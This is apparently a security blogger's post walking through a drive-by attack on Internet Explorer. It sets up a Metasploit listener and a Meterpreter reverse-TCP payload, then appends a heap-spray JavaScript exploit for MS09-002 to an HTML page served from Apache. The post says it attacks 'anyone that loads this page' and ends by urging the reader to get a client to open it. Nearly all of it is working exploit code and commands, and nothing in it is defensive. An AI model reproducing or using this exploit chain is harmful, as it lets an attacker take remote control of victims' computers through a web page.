If you were at ShmooCon, you may have heard the following phrase a few times, "Lets pop a box".

Okay, sure why not. So there was a recent IE vulnerability released with an exploit on milworm.

First, Metasploit with Meterpreter on the attack box 192.168.1.50:

./msfconsole
use exploit/multi/handler
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 443
exploit -j

(Note, 192.168.1.50 is the attack system, that will receive the connection back.)

We will be attacking anyone that loads this page.

Initial setup:

echo '<html>  <script language="JavaScript">' > ms09-002.html

Now setting up the Metasploit payload:

./msfpayload windows/meterpreter/reverse_tcp \
LHOST=192.168.1.50 \
LPORT=443 J | ./payloadproper.pl >> ms09-002.html

Append the milworm exploit to the end of the file.

http://milw0rm.org/exploits/8077

echo '
var array = new Array(); 
var ls = 0x100000-(c.length*2+0x01020); 
var b = unescape("%u0C0C%u0C0C"); 
while(b.length<ls/2) { b+=b;} 
var lh = b.substring(0,ls/2); 
delete b; 
for(j=0; j<0xC0; j++) { 
	array[j] = lh + c;
}
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));
function ok() { 
  o1=document.createElement("tbody"); 
  o1.click; 
  var o2 = o1.cloneNode();	
  o1.clearAttributes(); 
  o1=null; CollectGarbage(); 
  for(var x=0;x<a1.length;x++) a1[x].src=s1; 
  o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>
</html>' >> ms09-002.html

Time to start Apache and copy the attack to the webroot.

sudo /etc/init.d/apache2 start
sudo cp ms09-002.html /var/www
sudo chmod 755 /var/www/ms09-002.html

Okay, just get a client to open ms09-002.html and enjoy!!!!!!!

See everyone in Orlando at Infosec World. More details to come later.

-Jabra